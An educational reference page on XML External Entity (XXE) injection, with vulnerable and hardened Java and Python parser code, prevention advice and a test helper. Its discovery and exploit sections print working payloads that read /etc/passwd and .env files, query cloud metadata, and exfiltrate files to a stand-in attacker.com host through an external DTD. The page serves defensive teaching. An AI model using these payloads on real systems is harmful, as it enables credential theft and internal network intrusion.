XML External Entity (XXE)

External Entity Injection

XML External Entity (XXE) at a glance

What it is: An XML parser loads and expands external entities from files or network resources, letting attackers read local files or pivot to server-side request forgery (SSRF) during parsing.
Why it happens: XXE vulnerabilities occur when applications process untrusted XML with default or unsafe parser settings, allowing external entity resolution in uploads, integrations, or document handling.
How to fix: Disable DTDs and external entities for untrusted XML, block parser network access with safe resolvers, and prefer simpler formats like JSON when possible.

Overview

XXE happens when XML parsers expand entities defined in a DTD that point at external resources. Attackers embed SYSTEM or PUBLIC entities that reference files like /etc/passwd or internal HTTP endpoints. When the parser expands the entity, sensitive data can be disclosed or internal services contacted. The fix is to disable DTDs and external entity resolution and to run parsers with network access disabled.

sequenceDiagram
    participant Browser
    participant App as App Server
    participant XML as XML Parser
    Browser->>App: POST /upload-xml with SYSTEM entity
    App->>XML: Parse untrusted XML
    XML-->>App: Replaces &xxe; with file contents
    App-->>Browser: Sensitive data returned
    note over App,XML: Disable DTDs and entity expansion
A potential flow for an XML External Entity (XXE) exploit

Where it occurs

It occurs in file upload, XML processing, or integration endpoints like SOAP, SAML, or XML-to-JSON converters that use insecure parser settings or enable external entity resolution.

Impact

XXE can lead to file disclosure, credential and key leakage, request forgery against internal hosts, and in rare cases code execution if the parser supports dangerous URI schemes (for example, PHP's expect:// wrapper when the expect extension is loaded).

Prevention

Prevent XXE by rejecting XML when possible or using safe streaming parsers with DTDs and external entities disabled, empty resolvers, no network access, and strict time and size limits.
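
The advice above can be sketched with Python's standard library. This is a minimal sketch under stated assumptions, not a definitive implementation: parse_untrusted_xml, XMLRejected, and the MAX_XML_BYTES cap are hypothetical names chosen for illustration. It enforces a size limit and refuses any document that declares a DOCTYPE, using a first pass with the raw expat parser before building a tree. Time limits are not covered here.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

MAX_XML_BYTES = 1_000_000  # hypothetical cap; tune per endpoint


class XMLRejected(ValueError):
    """Raised when untrusted XML is too large, malformed, or declares a DOCTYPE."""


def _forbid_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this at the start of a DOCTYPE declaration; raising here
    # aborts the parse before any entity declaration is processed.
    raise XMLRejected("DOCTYPE declarations are not allowed")


def parse_untrusted_xml(data: bytes, max_bytes: int = MAX_XML_BYTES) -> ET.Element:
    if len(data) > max_bytes:
        raise XMLRejected("XML payload exceeds size limit")

    # Pass 1: scan with raw expat and stop at the first DOCTYPE.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _forbid_doctype
    try:
        scanner.Parse(data, True)
    except expat.ExpatError as exc:
        raise XMLRejected(f"malformed XML: {exc}") from exc

    # Pass 2: the document has no DTD, so it cannot define custom entities.
    return ET.fromstring(data)
```

Parsing twice costs some CPU, but it keeps the DOCTYPE check independent of whichever tree builder runs afterwards. A caller would typically map XMLRejected to an HTTP 400 response.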

Examples


DOM parser resolves external entities and allows file exfiltration

Default parser loads external entities from file or network.

Vulnerable
Java • JAXP DOMParser — Bad
DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
// BUG: no hardening, external entities and DTD allowed by default on some impls
DocumentBuilder b = f.newDocumentBuilder();
Document doc = b.parse(req.getInputStream());
  • Line 2: No features disabled, DTD and external entities may resolve

External entity references let attackers read files or make server side requests during parsing.

Secure
Java • JAXP DOMParser — Good
DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
f.setFeature("http://xml.org/sax/features/external-general-entities", false);
f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
f.setXIncludeAware(false);
f.setExpandEntityReferences(false);
DocumentBuilder b = f.newDocumentBuilder();
// Optionally install a resolver that substitutes empty content for any external entity
b.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
Document doc = b.parse(req.getInputStream());
  • Line 2: Disable DTD and both external entity features, and set an EntityResolver that returns empty content

Disable DTDs and entity expansion entirely for untrusted XML.

Engineer Checklist

  • Disallow doctype declarations in untrusted XML

  • Disable external entity resolution and set a safe resolver

  • Disable parser network access and set time and size limits

  • Prefer JSON or simple formats for untrusted data paths

  • Add tests that submit external entity payloads and expect rejection
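
The last checklist item can be sketched as a small canary test in Python. This is an illustrative sketch, not a prescribed harness: xxe_canary_leaks, stdlib_parse, and leaky_parse are hypothetical names, and the parse callable stands in for whatever function your application uses to turn XML bytes into text. The helper writes a random token to a temporary file, submits a SYSTEM entity pointing at it, and reports whether the token shows up in the output.

```python
import tempfile
import urllib.request
import uuid
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Callable


def xxe_canary_leaks(parse: Callable[[bytes], str]) -> bool:
    """Return True if `parse` discloses a local file through an external entity."""
    token = uuid.uuid4().hex
    with tempfile.TemporaryDirectory() as tmp:
        canary = Path(tmp) / "canary.txt"
        canary.write_text(token)
        payload = (
            '<?xml version="1.0"?>\n'
            f'<!DOCTYPE invoice [ <!ENTITY xxe SYSTEM "{canary.as_uri()}"> ]>\n'
            "<invoice><id>&xxe;</id></invoice>"
        ).encode()
        try:
            output = parse(payload)
        except Exception:
            # Rejecting the document outright counts as a pass.
            return False
        return token in output


def stdlib_parse(data: bytes) -> str:
    # Parser under test: the standard-library ElementTree parser.
    return ET.tostring(ET.fromstring(data), encoding="unicode")


def leaky_parse(data: bytes) -> str:
    # Deliberately unsafe stand-in that inlines the referenced file, mimicking
    # a misconfigured parser. It exists only to show the check is not vacuous.
    uri = data.split(b'SYSTEM "')[1].split(b'"')[0].decode()
    with urllib.request.urlopen(uri) as fh:
        return fh.read().decode()
```

In a test suite, the check would assert that xxe_canary_leaks returns False for the real parsing entry point. The leaky stand-in serves as a positive control, so a broken helper does not silently pass.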

End-to-End Example

An upload endpoint parses invoices from XML using default parser settings. An attacker submits a document with a SYSTEM entity that reads a local file, which is then included in the parsed output.

Vulnerable
JAVA
// Java/Spring Boot - Vulnerable to XXE

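import java.io.InputStream;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;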

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    // VULNERABLE: Using default DocumentBuilderFactory settings
    // Does NOT disable external entities or DTDs
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    
    // DANGEROUS: These security features are NOT set!
    // factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    // factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    
    DocumentBuilder builder = factory.newDocumentBuilder();
    
    // VULNERABLE: Parses untrusted XML with external entities enabled
    // Attacker sends:
    // <?xml version="1.0"?>
    // <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    // <invoice><id>&xxe;</id></invoice>
    Document doc = builder.parse(xmlInput);
    
    // Extract and return data (includes expanded external entities!)
    NodeList nodes = doc.getElementsByTagName("id");
    String invoiceId = nodes.item(0).getTextContent();
    
    return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
}

# Python/Flask + lxml - Also vulnerable
from flask import Flask, request
from lxml import etree

app = Flask(__name__)

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    
    # VULNERABLE: on lxml releases before 5.0 the default parser resolves external entities
    # Attacker sends:
    # <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    # <root><data>&xxe;</data></root>
    parser = etree.XMLParser()  # No resolve_entities=False!
    tree = etree.fromstring(xml_data, parser)
    
    result = tree.find('.//data').text
    return {'data': result}
Secure
JAVA
// Java/Spring Boot - SECURE against XXE

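import java.io.InputStream;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;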

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    
    // SECURE: Disable DTDs completely
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    
    // SECURE: Disable external entities
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    
    // SECURE: Disable external DTDs
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    
    // SECURE: Disable XInclude processing
    factory.setXIncludeAware(false);
    
    // SECURE: Disable entity expansion
    factory.setExpandEntityReferences(false);
    
    DocumentBuilder builder = factory.newDocumentBuilder();
    
    // Set entity resolver that returns empty content
    builder.setEntityResolver((publicId, systemId) -> {
        // Return empty input source for any external entity
        return new InputSource(new java.io.StringReader(""));
    });
    
    try {
        Document doc = builder.parse(xmlInput);
        
        NodeList nodes = doc.getElementsByTagName("id");
        String invoiceId = nodes.item(0).getTextContent();
        
        return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
    } catch (SAXException e) {
        // Will throw exception if DOCTYPE is found
        return ResponseEntity.badRequest()
            .body(Map.of("error", "Invalid XML: DOCTYPE not allowed"));
    }
}

# Python/Flask + lxml - SECURE
from flask import Flask, request
from lxml import etree

app = Flask(__name__)

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    
    # SECURE: Disable entity resolution
    parser = etree.XMLParser(
        resolve_entities=False,  # Don't resolve external entities
        no_network=True,         # Disable network access
        dtd_validation=False,    # Don't validate DTDs
        load_dtd=False          # Don't load DTDs
    )
    
    try:
        tree = etree.fromstring(xml_data, parser)
        
        # Reject documents that carry a DOCTYPE declaration
        if tree.getroottree().docinfo.doctype:
            return {'error': 'DOCTYPE not allowed'}, 400
        
        result = tree.find('.//data').text
        return {'data': result}
    except etree.XMLSyntaxError:
        return {'error': 'Invalid XML'}, 400

# ALTERNATIVE: Use JSON instead of XML when possible
@app.route('/api/upload-invoice', methods=['POST'])
def upload_invoice():
    # SECURE: Use JSON instead of XML to avoid XXE entirely
    data = request.get_json()
    invoice_id = data.get('id')
    return {'invoiceId': invoice_id}

Discovery

This vulnerability is discovered by submitting XML input containing external entity declarations and observing that the application processes them, either returning the entity content or exhibiting timing differences that confirm external resource access.

  1. Test basic external entity

    http

    Action

    Submit XML with simple SYSTEM entity to test if external entities are processed

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\"> ]>\n<invoice><id>&xxe;</id></invoice>"

    Response

    Status: 200
    Body:
    {
      "invoice_id": "prod-server-01\n",
      "message": "Invoice processed",
      "note": "Server hostname from /etc/hostname appears in response - XXE confirmed"
    }

    Artifacts

    xxe_confirmed entity_processing_enabled file_disclosure
  2. Probe for sensitive file disclosure

    http

    Action

    Test file:// protocol access to read /etc/passwd

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n<data><content>&xxe;</content></data>"

    Response

    Status: 200
    Body:
    {
      "content": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\napp-user:x:1000:1000::/home/app-user:/bin/bash\npostgres:x:999:999:PostgreSQL Server:/var/lib/postgresql:/bin/bash",
      "note": "Complete /etc/passwd file disclosed via XXE"
    }

    Artifacts

    passwd_file_disclosed system_users_enumerated file_access_confirmed
  3. Test outbound HTTP via SSRF

    http

    Action

    Verify parser can make HTTP requests to external/internal hosts

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://attacker.com/xxe-callback\"> ]>\n<data><test>&xxe;</test></data>"

    Response

    Status: 200
    Body:
    {
      "message": "Processed",
      "note": "Attacker server logs show: [2024-01-15 10:23:45] GET /xxe-callback HTTP/1.1 from 52.143.12.89 (prod-server.example.com)"
    }

    Artifacts

    ssrf_confirmed outbound_http_allowed xxe_ssrf_vector
  4. Test parameter entity for blind XXE

    http

    Action

    Use parameter entities to exfiltrate data via external DTD

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"file:///app/.env\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n]>\n<data>&send;</data>"

    Response

    Status: 200
    Body:
    {
      "message": "Processed",
      "note": "Attacker server receives: GET /exfil?data=DATABASE_URL%3Dpostgresql%3A%2F%2Fadmin%3APr0dP%40ss..."
    }

    Artifacts

    blind_xxe_confirmed data_exfiltration parameter_entity_processing

Exploit steps

An attacker exploits this by crafting XML payloads with external entity declarations that reference local files (file:///etc/passwd) or internal network resources, exfiltrating sensitive data or using the parser as an SSRF vector.

  1. Extract application secrets

    Read .env file containing database credentials and API keys

    http

    Action

    Use XXE to access application configuration files

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///app/.env\"> ]>\n<invoice><notes>&xxe;</notes></invoice>"

    Response

    Status: 200
    Body:
    {
      "invoice_notes": "DATABASE_URL=postgresql://admin:Pr0dP@ssw0rd2024@db.internal.example.com:5432/production\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nSTRIPE_SECRET_KEY=sk_live_51HxYz3FGHxYz3FGHxYz3FG\nJWT_SECRET=super-secret-jwt-key-do-not-share\nREDIS_URL=redis://cache.internal.example.com:6379/0",
      "note": "Complete application secrets exposed via XXE file disclosure"
    }

    Artifacts

    database_credentials aws_credentials stripe_api_key jwt_secret redis_connection
  2. Access cloud metadata service via SSRF

    Exploit XXE to query AWS EC2 metadata for IAM credentials

    http

    Action

    Use XXE as SSRF vector to access cloud provider metadata

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role\"> ]>\n<data><creds>&xxe;</creds></data>"

    Response

    Status: 200
    Body:
    {
      "creds": "{\n  \"Code\": \"Success\",\n  \"LastUpdated\": \"2024-01-15T10:23:45Z\",\n  \"Type\": \"AWS-HMAC\",\n  \"AccessKeyId\": \"ASIATESTACCESSKEY123\",\n  \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n  \"Token\": \"IQoJb3JpZ2luX2VjEHoaCXVzLWVhc3QtMSJIMEYCIQD...\",\n  \"Expiration\": \"2024-01-15T16:23:45Z\"\n}",
      "note": "IAM role credentials with S3, RDS, and EC2 permissions exposed"
    }

    Artifacts

    iam_credentials aws_metadata_access cloud_service_compromise temporary_credentials
  3. Exfiltrate via blind XXE

    Use out-of-band XXE to exfiltrate sensitive files

    http

    Action

    Leverage parameter entities to send file contents to attacker server

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=/app/config/database.yml\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n%send;\n]>\n<data></data>"

    Response

    Status: 200
    Body:
    {
      "message": "Processed",
      "attacker_log": "GET /exfil?f=cHJvZHVjdGlvbjoKICBhZGFwdGVyOiBwb3N0Z3Jlc3FsCiAgaG9zdDogZGIuaW50ZXJuYWwuZXhhbXBsZS5jb20...",
      "decoded": "production:\\n  adapter: postgresql\\n  host: db.internal.example.com\\n  database: production\\n  username: admin\\n  password: Pr0dP@ssw0rd2024",
      "note": "Database configuration exfiltrated via blind XXE to attacker server"
    }

    Artifacts

    blind_xxe_exfiltration database_config_leaked base64_encoded_data out_of_band_channel
  4. Enumerate internal network services

    Use XXE SSRF to scan internal network and identify services

    http

    Action

    Probe internal IP ranges to map network topology

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://10.0.0.5:6379/\"> ]>\n<data><service>&xxe;</service></data>"

    Response

    Status: 200
    Body:
    {
      "service": "-ERR wrong number of arguments for 'get' command\\r\\n",
      "note": "Redis server response at 10.0.0.5:6379 - internal service discovered",
      "additional_findings": {
        "10.0.0.3:5432": "PostgreSQL database server",
        "10.0.0.8:9200": "Elasticsearch cluster",
        "10.0.0.12:27017": "MongoDB instance",
        "10.0.1.50:8080": "Internal admin panel"
      }
    }

    Artifacts

    internal_network_map service_discovery redis_server_found attack_surface_expanded

Specific Impact

Sensitive files and service metadata are exposed, which can include credentials or configuration needed to pivot deeper into the environment.

Attackers may chain this with SSRF to query internal HTTP based services, leading to data theft or remote operations.

Fix

Harden the XML parser by prohibiting doctype declarations and turning off external entity resolution. Provide a resolver that returns empty input and, where possible, disable parser network access. Prefer simpler formats such as JSON for untrusted data.
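
As a rough illustration of the resolver-based hardening described above, the following Python sketch configures the standard-library SAX parser. The names EmptyResolver, TextCollector, and extract_text are hypothetical. It switches off the external general and parameter entity features and installs a resolver that returns empty input as a second layer, in case later code re-enables those features.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    EntityResolver,
    feature_external_ges,
    feature_external_pes,
)
from xml.sax.xmlreader import InputSource


class EmptyResolver(EntityResolver):
    """Substitute empty content for any external entity the parser asks for."""

    def resolveEntity(self, publicId, systemId):
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(b""))  # never open systemId itself
        return source


class TextCollector(ContentHandler):
    """Accumulate character data so callers can inspect the parsed text."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def extract_text(data: bytes) -> str:
    parser = xml.sax.make_parser()
    # Do not fetch external general or parameter entities.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    # Defense in depth: any resolution request gets empty input.
    parser.setEntityResolver(EmptyResolver())
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return "".join(collector.chunks)
```

This configuration still accepts a DOCTYPE and expands internal entities, so it is weaker than prohibiting doctype declarations outright. Treat it as a fallback for cases where DTDs cannot be rejected.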
